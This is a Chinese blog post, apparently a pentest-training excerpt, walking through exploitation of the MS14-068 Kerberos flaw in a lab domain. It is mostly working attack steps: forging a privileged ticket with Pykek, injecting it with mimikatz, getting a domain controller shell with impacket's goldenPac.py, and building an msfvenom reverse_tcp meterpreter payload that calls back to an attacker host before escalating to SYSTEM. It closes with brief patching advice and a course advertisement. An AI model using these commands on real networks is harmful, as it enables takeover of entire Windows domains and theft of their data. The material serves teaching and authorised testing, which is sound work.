kerberos-MS14-068(kerberos域用户提权)


微软官方在20141118日发布了一个紧急补丁,Windows全版本服务器系统受到影响,包括Windows Server 2003Windows Server 2008Windows Server 2008 R2Windows Server 2012Windows Server 2012 R2,修复了Microsoft Windows Kerberos KDC(CVE-2014-6324),该漏洞可导致活动目录整体权限控制受到影响,漏洞允许黑客将域内任意用户权限提升至域管理级别。通俗来讲,就是恶意攻击者获取域内任何一台计算机shell权限,同时还知道任意一名域用户用户名、sid、密码,即可拿下域管理员进而拿下域控制器,最后拿下整个域权限。

导致这个漏洞产生的原因就是在用户向KDC(Kerberos密钥分发中心)申请TGT(由票据授权服务产生的用来证明身份的凭证)时,可以伪造自己的Kerberos TicketKerberos票据),该Ticket声明自己是域管理员,而KDC在处理该Ticket时未正确验证Ticket的签名,所以返回给用户的TGT使普通域用户拥有了域管理员权限,该用户可以将TGT发送到KDCKDCTGS(票据授权服务)在验证TGT后,将Service Ticket(服务票据)发送给该用户,该用户拥有访问该服务的权限。使攻击者可以访问域内资源。



利用Kerberos提权的常用方法介绍

 

1、使用Pykek工具包配合mimikatz进行测试;

2、使用impacket工具包中goldenPac.py进行测试。

3、使用metasploit进行测试。

4、修复方案

我们常用的方法为第一种,好处是在于pykek只需要系统存在python2.7环境即可,还可以将python文件转换为exe,在免python环境下也可以执行。第二种方法的好处是可以直接得到交互shell,操作简单便捷,适合新手。但该工具是通过psexec的方式获得shell,该方法会产生大量日志,再之psexec已经被较多反病毒厂商列为危险文件,免杀效果较差。第三种方法好处是在metasploit下进行操作,metasploit是一款较为成熟的后渗透框架,其中包含大量exp,可以更快的进行渗透测试工作,坏处是操作步骤较多,较为复杂,不适合新手操作。

测试环境如下:

域:pentest.com

域账号:user1/Aa123456@

sid:S-1-5-21-3112629480-1751665795-4053538595-1104

域控:WIN-2K5J2NT2O7P.pentest.com

Kali:172.16.86.131

域机器:172.16.86.129



Pykek工具包

 

Pykek是利用Kerberos协议进行攻击的工具包,Pykek可以生成一张高权限的服务票据,再使用mimikatz(法国人开发的轻量级调试器)将服务票据注入到内存。

Pykek(Python Kerberos Exploitation Kit),其下载地址为

https://github.com/mubix/pykek,

如图6-47所示。

 

6-47脚本下载页面

 

1)工具说明

ms14-068.py为Pykek工具包中利用脚本,如图6-48所示

 

6-48 查看ms14-068.py

 

其参数如下

USAGE:ms14-068.py-u <userName>@<domainName> 用户名@域名-s <userSid>        用户sid-d <domainControlerAddr> 域控制器地址OPTIONS:-p <clearPassword> 明文密码。--rc4 < ntlmHash> 没有明文的情况下,Ntlmhash登录。

 

2)获取域控制器修复补丁情况

输入命令wmic qfe get hotfixid

微软对CVE-2014-6324提供的补丁修复为KB3011780,如图6-49所示,未发现该补丁。

 

6-49获取域控制器修复补丁情况

 

3)获取用户的SID

登录用户user1,输入命令,whoami/user。可以看到user1用户的SID为

S-1-5-21-3112629480-1751665795-4053538595-1104

如图6-50所示。

 

 

6-50获取用户的SID

 

还有一个方法也可以用来获取用户SID,

输入命令wmic useraccount get name,sid

可以获取域内所有用户名和SID,如图6-51所示。

 

 

6-51获取所有用户的SID

 

4)使用Kerberos利用工具Pykek生成高权限票据

使用方法:

ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

Pykek目录中输入如下命令,如图6-52所示,在当前目录生成了一个名为TGT_user1@pentest.com.ccache的票据文件。

python ms14-068.py -u user@pentest.com -s S-1-5-21-3112629480-1751665795-4053538595-1104 -d 172.16.86.130 -p Aa123456@

 

6-52使用Pykek生成高权限票据

 

5)查看注入前权限

将票据文件复制到Windows 2008机器mimikatz目录中,使用mimikatz将票据注入到内存。先查看当前是否有权限访问域控制器,输入命令,如图6-53所示。

 

6-53注入票据前无法列出域控制器C盘目录

 

输入命令net use \\WIN-2K5J2NT2O7P\c$,提示Access is denied。

 

6)清空内存中所有的票据

再打开mimikatz.exe,输入命令kerberos::purge清除现有票据信息,当看到Ticket(s) purge for current session is OK表示成功清除,如图6-54所示。

 

6-54清空内存中所有的票据

 

7)将高权限票据注入到内存

mimikatz中输入如下命令,看到Injecting ticket :OK表示成功注入,如图6-55所示,输入exit,退出mimikatz。

kerberos::ptc “TGT_user1@pentest.com.ccache”

 

6-55将高权限票据注入到内存中

 

8)高权限注入到内存后验证权限

查看是否可以连接域控制器,再次使用dir尝试列出域控制器C盘目录,如图6-56所示,成功列出域控制器C盘目录。

 

6-56注入后成功列出域控制器C盘目录

 

注:net use 在连接ip的时候可能会失败,故使用机器名进行连接。

 



goldenPac.py

 

goldenPac.py是被集成在impacket工具包中,用来操作kerberos的工具。goldenPac.py存放在impacket-master/examples目录中。

使用方法:

python goldenPac.py 域名称/域成员用户:域成员用户密码@域控制器地址

1)依赖环境准备,安装kerberos客户端

Kali中默认未包含kerberos客户端,首先安装它。

输入命令apt-get install  krb5-user -y

2)利用ms14-068配合psexec获取域控制器的cmd shell

goldenPac.py pentest.com/user1:jackpwd@dc.pentest.com

就可以得到一个cmd shell,如图6-57所示。

 

6-57使用goldenPac.py获得一个域控制器cmd shell

 

注:

1)该工具不止可以直接得到一个shell,还可以直接上传程序,

2)该工具可以直接执行获取一个Cobaltstrike Beacon。

 



metasploit中利用ms14-068攻击域控制器

 

首先打开metasploit找到ms14-068利用脚本位置如下。

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

列出该脚本所需选项,如图6-58所示。

 

6-58列出该脚本所有选项

 

DOMAIN:域名称

PASSWORD:被提权用户密码

USER:被提权用户

USER_SID:被提权用户SID

填写完成所有信息后输入exploit执行。在/root/.msf4/loot目录下生成了一个名为

kerberos::clist“20180715230259_default_172.16.86.130_windows.kerberos_839172.bin”

bin文件,如图6-59所示。

 

6-59执行脚本,攻击域控制器

 

接着进行转换格式。由于msf不支持bin格式文件导入,先使用mimikatz将文件转换格式,在mimikatz 中输入以下命令,导出后文件为kirbi格式,如图6-60所示。

kerberos::clist”20180715230259_default_172.16.86.130_windows.kerberos_839172.bin” /export

 

6-60 格式转换

 

最后使用msfvenom生成msf反向连接木马,在msfvenom中生成木马,如图6-61所示。

kali中输入如下命令。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.86.135 LPORT=4444 -f exe > shell.exe

 

6-61使用msfvenom生成msf木马

 

此时获得一个meterpreter的session,将生成的木马shell.exe上传到windows 2008机器中并执行。

metasploit中输入如下命令。

use exploit/multi/reverse_tcpset lhost 172.16.86.135set lport 4444exploit

可以看到上线一台主机ip为172.16.86.129。输入getuid回显PENTEST\user1,如图6-62所示。

 

6-62成功获取一个session并加载kiwi

 

输入

load kiwi

输入

kerberos_ticket_use /tmp/0-00000000-user1@krbtgt-PENTEST.COM.kirbi

将票据导入,然后输入命令background将meterpreter切到后台,这里就可以使用高权限票据来进行权限提升。

msf中输入以下命令执行。

use exploit/windows/local/current_user_psexecset TECHNIQUE PSHset RHOSTS WIN-2K5J2NT2O7P.pentest.comset payload windows/meterpreter/reverse_tcpset lhost 172.16.86.135set session 1Exploitmeterpreter > getuidServer username: NT AUTHORITY\SYSTEM

成功提升权限。



修复方案

 

1、开启Windows Update功能,进行自动更新。

2、手工下载补丁包进行修复,微软已经在官网发布修复补丁ms14-068。

3、对域内账号进行控制,禁止使用弱口令,及时并定期修改密码。

4、在服务器端安装反病毒软件,及时更新病毒库。

 

 

Ms08067安全实验室专注于网络安全知识的普及和培训,是专业的“图书出版+培训”的网络安全在线教育平台,专注于网络安全领域中高端人才培养。

平台已开设Web安全零基础就业,Web高级安全攻防进阶,红队实战攻防特训,Java代码安全审计,恶意代码分析与免杀实战,CTF基础实战特训营,网络安全应急响应,安全工具开发,AI与网络安全等系统培训课程。实验室出版安全图书《Web安全攻防:渗透测试实战指南》、《内网安全攻防:渗透测试实战指南》、《Python安全攻防:渗透测试实战指南》、《Java代码审计:入门篇》等。

扫描客服微信 获取更多课件+学习资料

 

posted @ 2024-04-02 10:11  Ms08067安全实验室  阅读(58)  评论(0编辑  收藏  举报